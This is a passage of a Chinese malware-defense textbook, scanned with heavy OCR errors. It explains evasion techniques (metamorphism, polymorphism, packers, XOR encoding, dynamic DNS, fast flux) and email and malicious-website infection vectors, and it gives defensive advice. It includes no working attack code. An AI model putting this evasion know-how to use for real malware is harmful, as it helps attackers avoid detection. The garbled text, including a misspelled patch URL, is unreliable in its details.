这 个 缺陷 可 能 是 一 个 未 知 实体 的 一 种 预先 测试 或 者 武器 测试 ， 因 为 实际 的 宿主 代码 带 有 在 某 些 初始 的 二 进 制 代码 分 析 时 就 可 以 避 
免 的 缺陷 。 记 住 ， 有 很 多 方法 能 够 用 来 确保 恶意 软件 难以 发 现 ， 这 些 方法 包括 变形 、 多 态 以 及 从 操作 系统 最 难 发 现 的 基于 硬件 的 
设备 感染 。 到 今天 为 止 ， 没 有 人 知道 这 个 缺陷 到 底 是 不 是 有 意 为 之 ， 因 为 分 析 师 们 试图 更 好 地 理解 StormWorm 的 方法 以 及 背后 
的 意图 ， 所 以 这 一 点 仍然 在 安全 界 中 继续 讨论 。 如 果 这 个 蠕虫 确实 计划 在 全 球 流行 ， 它 的 作者 可 能 已 经 花费 更 多 的 时 间 采 用 一 些 
更 加 复杂 的 技术 来 确保 这 个 Rootkit 更 加 难以 被 发 现 ， 或 者 持久 地 留 在 受害 的 主机 上 。 


1.7.2 ”变形 


变形 (metamorphism) 的 恶意 软件 在 复制 或 者 传播 时 发 生 改 变 ， 使 得 基于 特征 码 的 防 病毒 或 者 恶意 软件 删除 工具 难以 识 
别 它 。 每 个 变形 软件 与 原型 稍 有 不 同 ， 使 其 生存 足够 长 的 时 间 来 传播 到 其 他 系统 中 。 变 形 高 度 依赖 于 用 于 创建 变种 的 算法 。 如 果 
没有 合适 的 变形 算法 ， 就 可 以 采取 措施 来 枚 举 变形 引擎 可 能 出 现 的 重复 。 下 图 说 明了 变形 引擎 每 次 重复 时 如 何 改变 ， 使 变形 软件 
恰好 足够 改变 其 特征 码 ， 避 免 被 发 现 。 





变形 引擎 不 是 新 生 事物 ， 已 经 使 用 将 近 20 年 了 。 在 一 台 计 算 机 上 对 恶意 软件 进行 变异 的 方法 已 经 得 以 改进 ， 使 得 全 面 清除 
感染 甚至 发 现 恶 意 软 件 都 非常 困难 。 接 下 来 是 一 些 采 用 变形 的 臭名 昭著 的 恶意 软件 的 实例 。 


多 态 (polymorphism) 是 指 采 用 与 原型 不 同 的 结构 进行 自我 复制 的 恶意 软件 。 多 态 是 一 种 伪装 方式 ， 最 初 被 恶意 软件 编写 
者 用 于 挫败 采用 简单 字符 串 搜索 以 友 现 主机 上 恶意 软件 的 防 病毒 引擎 。 防 病毒 公司 很 快 就 对 这 种 方法 做 出 反击 ， 但 是 作为 多 态 核 
心 的 加 密 过 程 不 断 地 发 展 ， 使 得 恶意 软件 在 安全 的 主机 上 有 生存 能 力 。 下 图 展示 了 多 态 引擎 采用 的 一 种 典型 过 程 。 你 可 以 看 到 ， 
病毒 的 每 次 重复 都 完全 不 同 。 这 种 技术 使 防 病毒 软件 更 加 难以 发 现 恶意 软件 的 重复 。 第 7 章 中 将 会 介绍 ， 防 病毒 引擎 多 半 依 靠 查 
找 恶 意 软 件 的 基本 静态 代码 来 发 现 它 ， 有 些 时 候 ， 也 使 用 行为 特征 判断 方法 ， 试 图 识别 新 添加 的 文件 的 行为 是 否 类 似 恶 意 软 件 。 


可 变 关键 字 





这 种 抗 检 测 技术 一 般 被 认为 是 穷人 的 多 态 引 警 。 这 种 方法 从 一 组 预定 义 的 备 选 方案 中 选择 一 个 解密 程序 。 也 就 是 说 ， 这 些 预 
定义 的 备 选 方案 可 能 用 一 组 有 限 的 解密 程序 集 识 别 和 发 现 。 下 图 中 ， 你 可 以 看 到 喜 形 引擎 的 局 限 性 以 及 在 病毒 实际 投入 使 用 时 的 
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病毒 代码 


1.7.3 混淆 





大 部 分 日 常 所 见 的 恶意 软件 都 以 许多 方法 进行 混淆 。 最 常见 的 混淆 方式 是 通过 压缩 或 者 加 密 打包 代码 ， 这 些 将 在 本 书后 面 介 
绍 。 但 是 ， 代 码 混淆 的 概念 对 现在 的 恶意 软件 是 非常 重要 的 。 主 机 混淆 和 网 络 混淆 是 两 种 重要 的 混淆 类 型 ， 用 于 同时 绕 过 两 种 类 
型 的 保护 措施 。 


混淆 有 时 候 可 能 是 恶意 软件 崩溃 的 原因 。 例 如 ， 恶 意 软 件 编写 者 实施 了 非常 剧烈 的 混淆 方法 ， 以 至 于 网 络 防 御 者 实际 上 可 以 
使 用 逃避 的 技术 来 创建 检测 这 个 恶意 软件 的 特征 码 。 在 接 下 来 的 内 容 中 ， 我 们 打算 讨论 两 种 最 重要 的 恶意 软件 混淆 组 件 : 可 移植 
执行 体 (portable executable，PE) 打包 程序 和 网 络 编码 。 


存档 程序 、 加 密 程序 和 打包 程序 


许多 用 来 保护 数据 和 确保 完整 性 的 公用 程序 也 能 成 功 地 用 于 在 恶意 软件 传播 时 对 其 进行 保护 ， 最 重要 的 是 能 帮助 其 避 开 取证 
分 析 。 让 我 们 按照 变化 的 顺序 ， 也 即 存 档 程序 、 加 密 程序 和 打包 程序 的 顺序 来 研究 一 下 这 些 公用 程序 在 感染 系统 中 的 使 用 方法 。 


存档 程序 ”在 20 世 纪 90 年 代 未 ，ZIP、RAR、CAB 和 TAR 实用 程序 被 用 来 混淆 恶意 软件 。 为 了 运行 存档 程序 ， 必 须 将 其 安装 
在 受害 主机 上 ， 除 非 恶 意 软件 编写 者 将 这 个 程序 作为 装载 程序 的 一 部 分 。 这 种 方法 后 来 很 少 使 用 ， 因 为 要 使 恶意 软件 运行 ， 就 必 
须 解 压缩 ， 然 后 将 其 移 到 硬盘 上 的 某 个 位 置 ， 这 很 容易 被 防 病毒 引擎 发 现 并 删除 。 此 外 ， 现 在 的 大 部 分 防 病毒 引 警 深入 扫描 存档 
文件 ， 以 搜索 嵌入 的 执行 程序 。 这 种 方法 有 些 过 时 ， 并 且 没 有 得 到 广泛 的 使 用 ， 原 因 主 要 是 防 病毒 扫描 程序 的 成 熟 及 其 深入 扫描 


存档 文件 的 能 力 。 


加 密 程序 ”通常 大 部 分 软件 开发 人 员 用 这 些 程序 来 保护 应 用 程序 的 核心 代码 。 这 些 核心 代码 被 加 密 并 压缩 ， 使 得 黑客 很 难 进 
行 逆 向 工程 或 者 识别 应 用 程序 中 的 函数 。 实 用 加 密 学 (Cryptovirology) 与 对 恶意 软件 用 来 混淆 和 保护 自己 以 得 到 长 期 生存 能 力 
的 加 密 过 程 的 研究 有 相同 的 意义 。 历 史上 ， 恶 意 软 件 实施 共享 密 铀 (对 称 ) 加 密 方 法 ， 但 是 一 旦 数字 取证 业界 识别 出 这 种 方法 ， 
很 容易 将 其 倒 推 出 来 ， 这 促进 了 当前 实施 的 公 钥 加 密 。 


打包 程序 现在 ， 几 乎 所 有 恶意 软件 实例 都 以 某 种 方式 采用 打包 程序 ， 以 绕 过 防 病毒 或 者 防 间谍 工具 这 些 安全 软件 。 简 单 地 
说 ， 打 包 程序 是 一 个 用 于 混淆 执行 恶意 病毒 功能 的 主体 代码 的 加 密 模块 ， 用 于 在 传输 时 避 开 网 络 检测 工具 以 及 基于 主机 的 保护 产 
品 。 现 在 的 互联 网 上 有 数 十 个 可 用 的 公开 或 者 不 公开 的 打包 程序 。 不 公开 的 一 次 性 打包 程序 最 难 发 现 ， 因 为 它们 没有 公开 ， 企 业 
安全 型 产品 不 能 很 容易 地 识别 它们 。 打 包 程 序 和 存档 工具 有 明显 的 不 同 ， 普 通 计算 机 用 户 一 般 不 采用 这 些 工具 。 打 包 程 序 一 般 保 
护 可 执行 程序 和 DLL， 不 需要 在 受害 主机 上 预先 安装 任何 工具 。 


正如 黑客 的 技能 水 平一 样 ， 打 包 程 序 也 有 不 同 的 完备 度 以 及 许多 功能 性 选项 。 打 包 程序 常常 能 对 抗 防 病毒 保护 ， 也 能 增强 恶 
意 软 件 的 隐蔽 性 。 打 包 程 序 能 够 为 黑客 提供 一 组 健壮 的 功能 ， 例 如 发 现 虚拟 计算 机 并 进入 使 其 骨 溃 、 生 成 很 多 异常 、 利 用 多 态 代 
码 避 开 执 行 防护 ， 以 及 插入 无 用 指令 增加 打包 后 的 文件 尺寸 ， 从 而 更 难 发 现 等 一 系列 的 能 力 。 你 一 般 会 在 这 些 无 用 指令 中 发 现 
ADD、SUB、XOR 指 令 以 及 对 空 图 数 的 调用 ， 这 些 指令 用 来 摆脱 取证 分 析 。 你 还 会 发 现 多 个 文件 〈 例 如 可 执行 文件 ) 一 起 打包 
或 者 一 起 受到 保护 ， 其 他 可 执行 文件 将 装载 到 第 一 个 被 解 包 的 文件 的 地 址 空间 中 。 


下 图 是 打包 程序 过 程 的 一 个 简单 实例 。 


开始 
可 执行 文件 


结束 解 包 程序 





使 用 打包 程序 最 强大 的 地 方 是 恶意 软件 不 需要 访问 硬盘 ， 所 有 程序 都 作为 进程 内 存 运行 ， 这 一 般 能 够 避 开 大 部 分 防 病毒 和 基 
于 主机 的 安全 工具 。 利 用 这 种 方法 ， 如 果 这 个 打包 程序 是 知名 的 ， 防 病毒 引擎 能 够 在 其 解 包 恶 意 软件 时 发 现 它 。 如 果 打 包 程 序 是 
不 公开 或 者 新 型 的 ， 那 么 防 病毒 软件 就 不 可 能 避免 恶意 软件 运行 ， 在 这 次 对 抗 中 也 就 失败 了 ， 并 且 不 能 触发 任何 使 管理 员 采 取 行 
动 的 警告 。 在 图 1-4 中 ， 你 能 够 清晰 地 看 到 ， 前 几 年 数字 取证 业界 发 现 的 打包 程序 的 数量 的 增长 。 
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图 1-4 2007 一 2009 年 间 发 现 的 打包 程序 
网 络 编码 


大 部 分 网 络 安全 工具 可 以 使 用 网 络 编码 来 避 开 。 现 在 几乎 所 有 企业 网 络 都 允许 HTTP 或 者 HTTPS 通 过 所 有 网 关 ， 所 以 编码 后 
的 恶意 软件 能 够 轻易 地 穿越 边界 防护 系统 。 


下 面 是 一 些 网 络 编码 方法 的 实例 。 


从 技术 上 说 ， 处 理 编 码 /解码 并 非 易 事 。 因 为 网 络 通信 必须 快速 ， 但 是 流量 的 解码 可 能 造成 性 能 退化 ， 影 响 易 用 性 。 通 过 编 
码 绕 过 网 络 安全 手段 的 做 法 确实 存在 ,但 是 我 们 不 要 忘记 ， 这 是 在 网 络 分 析 工 具 不 进行 影响 易 用 性 的 复杂 分 析 的 前 提 下 实现 的 。 


XOR XOR 是 一 种 简单 的 加 密 过 程 ， 用 于 避免 网 络 通信 被 网 络 安 全 设备 友 现 。XOR 流 一 般 隐藏 在 安全 套 接 字 层 (SSL) 这 样 
的 协议 中 。 这 样 ， 如 果 1DS 分 析 师 只 进行 一 次 简单 的 评估 ， 这 次 通信 看 上 去 是 加 密 的 ， 但 是 进行 了 深入 的 封包 检测 之 后 ， 分 析 师 
将 会 注意 到 这 个 流 不 是 真正 的 SSL 通 信 。 


XOR 是 一 种 简单 的 二 进 制 运算 ， 如 果 两 个 二 进 制 输入 值 相等 ， 则 输出 0; 如 果 不 相等 ， 则 输出 1。XNOR 正 相反 ， 如 果 两 个 
输入 值 相等 ， 则 输出 1; 如 果 两 个 输入 值 不 同 ， 则 输出 0。 当 恶意 软件 准备 执行 时 ， 它 将 通过 相反 的 过 程 访问 数据 ， 运 行 所 编写 
的 实际 二 进 制 文件 。XOR 和 XNOR 是 快速 改变 静止 或 者 运行 中 的 数据 以 避 开 检测 方法 的 简单 引擎 。 


O 





X Y X YJO 
0 00 0 Oj} 1 
0 11 0 1 | 0 
1 O} 1 1 00 
1 1 |0 | | 





大 部 分 聪明 的 恶意 软件 编写 者 不 会 采用 存档 程序 来 进行 编码 ， 因 为 大 部 分 企业 网 关 应 用 程序 能 够 解码 各 种 公用 的 存档 程序 。 
在 网 络 中 虽然 可 以 实现 存档 保护 的 恶意 软件 的 分 段 传输 或 者 “ 断 续 ” 的 传输 ， 但 是 如 果 恶 意 软 件 的 任意 部 分 被 识别 出 来 ， 它 将 被 
从 系统 中 清除 ， 这 样 恶意 软件 就 无 法 被 组 合成 编写 者 所 希望 的 整体 。 


1.74 动态 域名 服务 


动态 域名 服务 (Dynamic Domain Name Services, DDNS) 是 黑客 们 最 新 的 发 明 ， 而 最 先 它 是 使 企业 管理 员 能 够 快速 地 
在 网 络 中 增加 机 器 的 一 种 管理 性 改进 。 当 Microsoft 在 其 活动 目录 企业 版 系统 中 实现 DDNS， 并 将 其 作为 一 种 快速 将 机 器 上 线 和 
离线 的 情况 通知 网 络 上 的 其 他 计算 机 的 手段 时 ，DDNS 就 为 人 们 所 熟知 了 。DDNS 使 恶意 软件 能 够 进行 外 部 联网 和 匿名 操作 而 不 
用 担心 归属 地 被 友 现 。DDNS 是 一 种 域名 系统 ， 它 的 域名 IP 解 析 可 以 实时 更 新 ,一般 在 几 分 钟 内 就 能 完成 。 域 名 的 宿主 名 称 服务 
器 几乎 始终 保持 着 指挥 控制 服务 器 的 缓冲 记录 。 但 是 ， (被 入 侵 的 /受害 ) 主机 的 IP 地 址 可 以 在 任何 地 方 并 且 可 以 随时 移动 。 将 
域 的 缓冲 限制 在 很 短 的 时 间 内 ( 几 分 钟 ) ， 可 以 避免 其 他 名 称 服务 器 节点 缓冲 原始 主机 的 旧地 址 ， 确 保 受 害 者 使 用 恶意 软件 编写 
者 控制 的 名 称 服务 器 进行 解析 。 


1.7.5 Fast Flux 


Fast Flux 是 当前 的 僵尸 网 络 、 恶 意 软件 和 仿冒 方案 最 常用 的 通信 平台 之 一 ， 通 过 一 个 不 断 变化 的 被 侵入 代理 主机 的 网 络 ， 
可 用 此 平台 传递 内 容 和 指挥 控制 。 对 等 网 络 拓扑 结构 也 能 够 将 Fast Flux 作 为 遍及 多 个 指挥 控制 服务 器 的 指挥 控制 框架 ， 像 菊花 
链 一 样 传递 信息 而 不 用 担心 被 发 现 。Fast Flux 和 DDNS 很 相似 ， 但 是 速度 更 快 ， 想 要 抓 住 恶 意 软件 背后 的 编写 者 和 策划 者 将 会 
更 加 困难 。 我 们 前 面 提 到 的 StormWorm 就 是 很 好 地 利用 这 一 技术 的 一 个 新 型 恶意 软件 变种 。 图 1-5 展 示 了 两 种 形式 的 Fast 
Flux: Single-Flux 和 Double-Flux。 在 这 张 图 中 ， 你 能 看 到 受害 者 之 间 的 Single-Flux 和 Double-Flux 的 简单 过 程 ， 以 及 每 种 方 
法 的 查找 过 程 。 


Single-Flux Double-Flux_ 


4) 查询 被 重 定 
“防弹 ”的 问 并 返回 应 答 
DNS 服务 器 Rs 
| g 
ns.example.com ns. kA com 
: on 
6) 应 容 : 5) 应 管 : 
10.10.10.10 10.10.10.10 
3) 查询 : 3) 查询 : 
flux.example.com flux.example.com 


2) 参照 : 2) 参照 : 
ns.example.com ns.example.com 


1) 查询 : 1) 查询 : 


flux.example. ae flux. ee com 


DNS 解析 方法 对 比 


图 1-5 Single-Flux 和 Double-Flux 





Single-Flux 


Fast Flux 的 第 一 种 方式 一 般 在 一 个 网 络 中 包含 多 个 节点 来 登记 和 注销 地 址 。 这 种 方式 一 般 与 用 于 单个 DNS 条 目的 一 个 DNS 
A (地 址 ) 记录 相关 ， 并 且 为 单一 域名 生成 一 个 变动 的 目标 地 址 列表 ， 这 个 列表 的 条 目 数 可 能 从 几 百 到 几 干 条 。 一 般 来 
说 ，Single-Flux DNS 记 录 的 生存 时 间 (TTL) 设置 得 非常 得， 以 确保 记录 不 会 被 缓冲 ， 地 址 能 够 快速 地 移动 而 不 用 担心 被 记 
录 。 


Double-Flux 


第 二 种 形式 的 Fast Flux 的 实现 要 困难 得 多 ， 虽 然 和 Single-Flux 相 似 ， 但 是 多 台 主 机 并 不 是 组 成 一 个 登记 和 注销 DNS A 记录 
的 网 络 ， 而 是 组 成 一 个 名 称 服 务 器 的 网 络 ， 登 记 和 注销 生成 DNS 分 区 列表 的 NS 记录 。 如 果 一 个 节点 被 发 现 ， 这 种 实现 确保 恶意 
软件 具备 一 个 保护 层 和 生存 能 力 。 你 一 般 会 看 到 被 侵入 的 主机 在 名 称 服务 器 网 络 中 作为 代理 ， 将 这 些 主机 埋藏 到 一 个 代理 网 络 
中 ， 有 助 于 保护 执行 指令 的 恶意 软件 网 络 的 身份 。 由 于 代理 的 数量 很 多 ， 完 全 可 能 保护 恶意 软件 编写 者 ， 这 也 就 增加 了 恶意 软件 
系统 的 生存 率 ， 甚 至 超过 了 放置 在 合适 位 置 用 于 避免 受 侵害 主机 访问 多 个 可 能 的 指挥 控制 点 的 IP 块 的 能 


要 记 住 ， 攻 击 者 只 需要 一 个 方向 就 能 对 你 发 动 攻击 ， 而 防御 者 需要 知道 并 且 保护 所 有 的 方向 ， 谁 的 成 功 概 率 更 大 ”在 这 个 领 
域 警 惕 性 是 必须 的 。 


由 于 利益 的 关系 ， 过 去 10 年 中 为 了 简化 管理 员工 作 所 添加 的 路 由 和 网 络 服务 功能 正 被 不 法 分 子 利 用 。 除 了 对 你 的 用 户 进行 
全 面 的 培训 和 教育 ， 让 他 们 在 没有 真正 得 到 信任 的 邮件 发 送 者 的 确认 之 前 ， 不 要 打开 邮件 或 者 附件 〈 即 使 这 些 邮 件 的 来 源 受 到 信 
任 ) 之 外 ， 对 这 些 技术 没有 更 好 的 防范 措施 。 这 么 总 结 起 来 有 些 伤心 ， 但 是 现在 你 的 用 户 是 最 后 一 条 防线 。 如 果 他 们 没有 得 到 进 
行 简单 分 析 的 培训 ， 你 的 网 络 就 会 因为 我 们 已 经 讨论 过 的 这 些 传播 方式 而 遭 到 失败 。 要 注意 ， 现 在 的 用 户 还 没有 能 够 快速 地 由 电 
子 邮件 附件 中 接收 到 的 域名 验证 域名 和 /或 真实 性 的 工具 。 有 些 企业 工具 能 够 鉴定 真实 性 ， 但 是 执行 真实 性 验证 所 需 的 时 间 对 于 
日 常 商业 运作 来 说 成 本 可 能 太 高 。 


现在 我 们 来 到 了 本 章 中 有 趣 的 一 部 分 .…… 


18 恶意 软件 传播 注入 方向 


本 小 节 将 介绍 恶意 软件 传递 到 受害 者 以 便 进 入 计算 机 的 真正 方法 。 有 许多 主动 的 方法 来 向 受害 者 发 送 和 传递 恶意 软件 ， 也 有 
一 些 依赖 于 社会 工程 或 者 受害 者 访问 存储 恶意 软件 的 内 容 的 被 动 方法 。 这 些 方法 每 天 都 在 使 用 着 ， 本 小 节 希 望 提供 对 恶意 软件 生 
命 周期 中 的 一 个 重要 部 分 的 一 些 认 识 ， 这 个 部 分 就 是 一 一 使 你 成 为 受害 者 。 


1.8.1 电子 邮件 


你 是 否 曾经 接收 到 带 有 不 能 确定 附件 内 容 的 邮件 ， 而 在 惊 鸿 一 敬之 间 这 个 邮件 又 能 引起 你 的 足够 兴趣 去 打开 ?电子 邮件 成 为 
网 络 管理 员 的 灾 星 以 及 所 有 坏 家 伙 们 进入 你 的 网 络 的 门户 已 经 有 超过 10 年 的 历史 了 ， 在 20 世 纪 90 年 代 时 如 此 ， 现 在 这 种 案例 变 
得 更 多 了 。 从 安全 管理 员 的 角度 来 说 ， 你 希望 尽 可 能 地 阻挡 。 从 网 络 运营 的 角度 来 说 ， 你 希望 尽 可 能 确保 业务 持续 性 ， 这 意味 着 
开放 一 些 门户 。 电 子 邮 件 是 你 的 网 络 中 始终 开放 的 两 个 门户 之 一 ， 另 一 个 是 恶意 网 站 。 我 们 将 在 本 章 后 面 的 内 容 中 介绍 恶意 网 
站 。 从 2007 年 开始 ， 由 于 企业 安全 措施 和 边界 保护 的 加 强 ， 通 过 直接 的 机 器 对 机 器 进行 感染 的 蠕虫 传播 已 经 基本 终结 。 


从 历史 上 看 ,管理 员 常 常 忽 略 这 一 点 。 网 络 中 的 最 后 一 个 堡垒 和 最 强大 的 入 口 就 是 用 户 ， 但 是 恶意 软件 作者 不 会 忽视 这 一 
点 。 用 户 是 穿 透 任 何 网 络 硬 壳 的 途径 。 最 常见 的 基于 电子 邮件 的 恶意 软件 注入 技术 包含 嵌入 式 的 攻击 ， 所 使 用 的 技术 也 称 为 客户 
端 攻击 。 社 会 工程 是 所 有 基于 电子 邮件 攻击 的 核心 ， 这 也 同时 训练 了 你 的 员工 。 然 而 ， 在 我 作为 顾问 的 大 部 分 组 织 中 ， 领 导 层 都 
没有 太 把 这 一 点 放 在 心 上 。 


在 你 的 用 户 打开 接收 到 的 所 有 电子 邮件 时 ， 你 仍然 觉得 安心 吗 ? 很 多 时 候 ， 我 希望 用 胶带 把 网 络 上 的 用 户 捆 起 来 ， 或 者 在 键 
盘 和 他 们 之 间 放 置 一 层 厚 玻 璃 ， 只 允许 他 们 通过 一 个 小 洞 ， 一 次 只 能 按 下 一 个 键 ， 从 而 延缓 病毒 的 爆发 。 关 键 是 ， 你 不 能 限制 网 
络 用 户 完成 日 常 的 业务 操作 。 如 果 这 么 做 ， 他 们 当然 会 寻找 绕 过 你 的 安全 措施 的 途径 。 所 以 运营 、 安 全 和 用 户 培训 及 意识 之 间 始 
终 有 联系 。 


@” 电子 邮件 威胁 





本 小 节 重 点 介绍 两 个 最 难 对 付 的 传递 机 制 之 一 。 在 当今 的 商业 界 ， 每 个 员工 通常 都 得 到 一 个 公司 或 者 业务 电子 邮件 地 址 同 外 
部 组 织 或 者 个 人 进行 业务 联络 。 这 对 于 安全 管理 员 来 说 是 个 艰巨 的 工作 ， 对 于 负责 这 一 工作 的 利益 相关 方 来 说 是 更 大 的 负担 ,他 
们 需要 不 断 培 训 和 监控 员工 ， 确 保 员 工 理解 和 意识 到 威胁 。 如 果 你 以 同 恶意 软件 斗争 为 生 ， 这 些 方法 中 有 些 可 能 非常 熟悉 ， 但 是 
有 些 方 法 则 可 能 是 陌生 的 。 


受信 任 的 内 部 人 员 的 社会 工程 : 在 本 书 中 ， 与 恶意 软件 相关 的 社会 工程 已 经 多 次 提 到 ， 以 后 还 将 不 断 地 介绍 ， 因 为 社会 工程 
是 迄今 为 止 恶意 软件 作者 最 强 有 力 的 注入 方向 。 确 保 受信 任 的 内 部 人 员 不 会 发 现 自己 正在 阅读 一 封 普通 的 “跳舞 能 ”邮件 或 者 高 
度 成 熟 的 “针对 性 ”邮件 是 犯罪 分 子 最 重要 的 目标 一 这 两 种 邮件 都 用 来 思 弄 阅读 者 ， 使 其 打开 或 者 执行 其 内 容 或 附件 ， 以 便 
控制 收 件 人 的 系统 。 一 旦 犯罪 分 子 对 受害 者 展开 社会 工程 ， 攻 击 者 可 以 使 用 几乎 任何 方法 来 利用 受害 者 。 最 后 ， 对 于 安全 管理 员 
来 说 最 重要 的 一 点 是 ， 真 正 理 解 并 且 知 道 这 种 方法 需要 你 尽 到 职责 ， 确 保安 全 程序 包含 对 新 来 的 雇员 的 强制 性 培训 |。 





作为 恶意 软件 后 门 的 电子 邮件 : 这 种 技术 最 早 见于 2008 年 夏季 一 一 恶意 软件 有 足够 的 智能 ， 可 以 下 载 自己 的 安全 套 接 字 层 
动态 链接 库 (ssl.dll) ， 然 后 ， 该 库 使 恶意 软件 可 以 打开 自己 通 向 外 部 公共 Web 电 子 邮 件 系 统 (Yahoo! 、Hotmail、Gmail 
=) 的 隐秘 信道 。 这 意味 着 什么 ”你 的 内 部 系统 和 公共 个 人 电子 邮件 系统 的 通信 可 能 是 恶意 软件 正在 登录 、 接 受 新 的 更 新 或 者 指 
令 ， 也 可 能 是 从 你 的 内 部 网 络 发 送 数据 。 在 与 遭受 攻击 的 一 些 组 织 接洽 期 间 ， 这 种 方法 已 经 发 现 了 多 次 。 


ô 电子 邮件 攻击 类 型 : Microsoft Office 文 件 处 理 





一 般 来 说 ， 这 是 社会 工程 之 后 的 第 二 次 注入 。 这 种 方法 采用 大 量 Microsoft Office 产 品 中 潜藏 的 各 种 利用 代码 。 到 目前 为 
lE, Microsoft Word、Excel、PowerPoint 和 Outlook 已 经 成 为 主要 的 焦点 。 但 是 ， 很 多 其 他 产品 已 经 成 为 目标 ， 变 成 电子 邮 
件 附 件 执行 以 后 立即 快速 入 侵 系 统 的 一 种 途径 。 最 重要 的 一 点 是 ， 这 种 类 型 的 攻击 可 以 用 于 Adobe 和 几乎 所 有 运行 在 你 的 系统 
上 的 、 用 于 阅读 和 /或 打开 附件 的 本 地 应 用 程序 。 下 面 我 们 介绍 几 百 种 这 种 类 型 的 攻击 中 的 一 种 ， 供 你 参考 。 


- 名 称 : Microsoft Office 内 存 损坏 漏洞 

- CVE: CVE-2015-2477 

- CWE ID: 119 

.Microsoft 安全 性 公告 : MS15-081 

* 描述 : 该 漏洞 允许 远程 攻击 者 通过 伪造 的 文档 执行 任意 代码 

- 受 影响 的 系统 : Microsoft Office2007SP3, Office for Mac2011, Office for Mac2016 以 及 Word Viewer 


` 解决 方案 : 该 汤 洞 已 经 修复 ， 用 户 应 该 应 用 https://technet.microosft.com/library/secutity/ms15-081 的 补丁 


Ə 电子 邮件 威胁 的 对 策 
在 接 下 来 的 小 节 中 ， 我 们 将 讨论 对 抗 当今 的 电子 邮件 威胁 的 一 些 最 强 有 力 的 对 策 。 虽 然 这 些 对 策 看 上 去 很 简单 ， 但 是 非常 重 


要 。 


原则 1 保护 自己 免 受 电子 邮件 传递 的 恶意 软件 感染 的 最 重要 步骤 是 了 解 所 收 到 的 内 容 。 你 接收 到 的 文件 是 不 是 一 个 已 知 的 
恶意 软件 携带 者 ， 是 不 是 能 够 控制 你 的 系统 ? 确保 你 的 用 户 启 用 “查看 文件 扩展 名 ”功能 。 


原则 2 ”除非 你 迫切 地 需要 一 个 文件 ， 否 则 绝 不 要 打开 来 自任 何人 的 可 执行 文件 ， 因 为 恶意 软件 一 般 都 来 自 于 你 所 认识 的 某 
个 人 。 让 向 你 发 送 可 执行 文件 的 朋友 在 传输 之 前 修改 文件 扩展 名 ， 例 如， 将 .exe 改 为 .ex_，.zip 改 为 .zzz。 更 重要 的 是 在 附件 有 问 
题 时 参照 原则 3。 应 该 牢记 ， 这 种 方法 仅 在 不 执行 识别 文件 类 型 的 文件 头 检查 的 电子 邮件 系统 下 有 效 。 


原则 3 ”任何 时 候 都 始终 为 你 的 系统 打上 补丁 。 我 们 强烈 建议 家 庭 用 户 将 系统 配置 为 每 天 至 少 检查 一 次 更 新 。 更 新 的 时 间 设 
置 最 好 为 深夜 或 者 凌晨 ， 可 以 避免 与 其 他 应 用 程序 和 /或 日 常 业务 操作 冲突 。 对 于 企业 用 户 ， 我 们 强烈 建议 使 用 Microsoft 
Windows 软 件 更 新 服务 (SUS) 管理 器 ， 这 个 套件 能 够 从 单一 服务 器 在 整个 企业 网 络 中 推送 更 新 ， 可 以 设置 为 每 天 多 次 检查 更 
新 ， 并 且 只 需要 从 单 点 下 载 。 这 能 避免 使 你 的 整个 企业 每 天 都 从 Microsoft 下 载 一 次 ， 从 而 根据 企业 办 公 室 的 不 同位 置 ， 在 不 同 
的 时 段 突 然 造 成 网 络 上 的 瓶颈 。 


原则 4 如果 不 需要 ， 就 删除 附件 。 


亲身 经 历 : 电子 邮件 利用 


我 曾经 在 不 同 信息 安全 技术 水 平 的 私营 企业 和 美国 联邦 政府 的 IT 安全 岗位 上 工作 过 。 最 致命 的 电子 邮件 利用 方式 被 称 为 鱼 又 
式 仿冒 (spear phishing) 或 者 岩石 仿冒 (rock phishing) 。 恶 意 软 件 散布 者 或 者 编写 者 通过 这 些 方式 ， 编 造 一 个 组 织 用 户 所 信任 的 
地 址 ， 或 者 来 自 于 用 户 所 知晓 的 组 织 的 地 址 来 发 送 精心 编造 的 电子 邮件 。 这 种 威胁 已 经 在 美国 政府 网 络 中 蔓延 超过 5 年 了 ， 安 全 
工作 中 最 大 的 不 足 是 工作 人 员 不 能 清楚 地 理解 阅读 和 打开 邮件 能 带 来 多 大 威胁 。 在 我 的 经 历 中 ， 我 已 经 看 到 在 各 种 信息 安全 技术 
水 平 的 组 织 中 ， 都 有 很 多 人 和 急 急 忙 忙 地 打开 这 些 邮件 去 阅读 ， 导 致 自己 的 网 络 遭 到 感染 。 用 户 很 难 完全 理解 究竟 谁 才 是 可 信任 的 
邮件 发 送 者 ， 虽 然 有 一 些 可 用 的 培训 ， 但 是 仍然 严重 缺乏 实际 的 工具 。 


1.8.2 ”恶意 网 站 


客户 端 攻击 在 过 去 的 几 年 中 已 经 兴起 ， 坏 家 伙 们 已 经 意识 到 用 户 还 没有 受到 良好 的 训练 ， 因 此 容易 采取 社会 工程 手段 。 我 们 
不 是 说 用 户 不 聪明 ， 他 们 只 是 缺乏 训练 。 


让 我 们 来 讨论 一 下 Contagion 蠕 虫 的 概念 。 在 《How to own the Internet in Your Spare Time) (如 何在 业余 时 间 里 拥 
有 互联 网 ) 这 篇 文章 中 (可 在 http://www.icir.org/vern/papers/cdc-usenix-sec02/ 上 找到 ) ， 作 者 讨论 各 种 传播 技术 ， 但 是 
这 篇 文章 最 核心 的 部 分 是 对 Contagion 蠕 虫 概念 的 讨论 。 这 种 蠕虫 能 够 无 颖 地 从 服务 器 转移 到 客户 端 ， 从 而 在 正确 运行 的 情况 
下 ， 几 个 小 时 内 就 可 能 感染 数 百 万 台 机 器 ， 从 这 点 上 说 ，Contagion 早 虫 的 概念 类 似 于 “完美 风暴 ”。 


看 上 去 相当 具有 毁 丈 性 ， 不 是 吗 ” 这 种 方法 非常 高 效 ， 可 能 导致 数 百 万 互联 网 用 户 沦 为 恶意 软件 传染 的 受害 者 ， 而 且 在 相当 
长 的 时 间 内 他 们 并 不 知情 。 


NIZ 
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恶意 网 站 威胁 





恶意 网 站 是 个 严重 的 问题 ， 因 为 任何 网 站 都 可 能 是 恶意 的 ， 即 使 一 些 最 有 名 的 网 站 也 已 经 成 为 恶意 组 织 的 猎物 ， 恶 意 组 织 将 
恶意 软件 载 入 这 些 网 站 ， 等 待 数 百 万 不 知情 的 用 户 访问 该 网 站 ， 从 而 立刻 被 特洛伊 植 入 程序 感染 。 现 在 ， 大 部 分 时 候 ， 你 将 发 现 
1/5 的 网 站 正 处 于 被 恶意 软件 感染 而 变 成 恶意 网 站 的 危险 之 中 。 另 一 方面 ， 实 际 上 1/20 的 网 站 有 某 种 形式 的 恶意 感染 、 府 入 重 定 
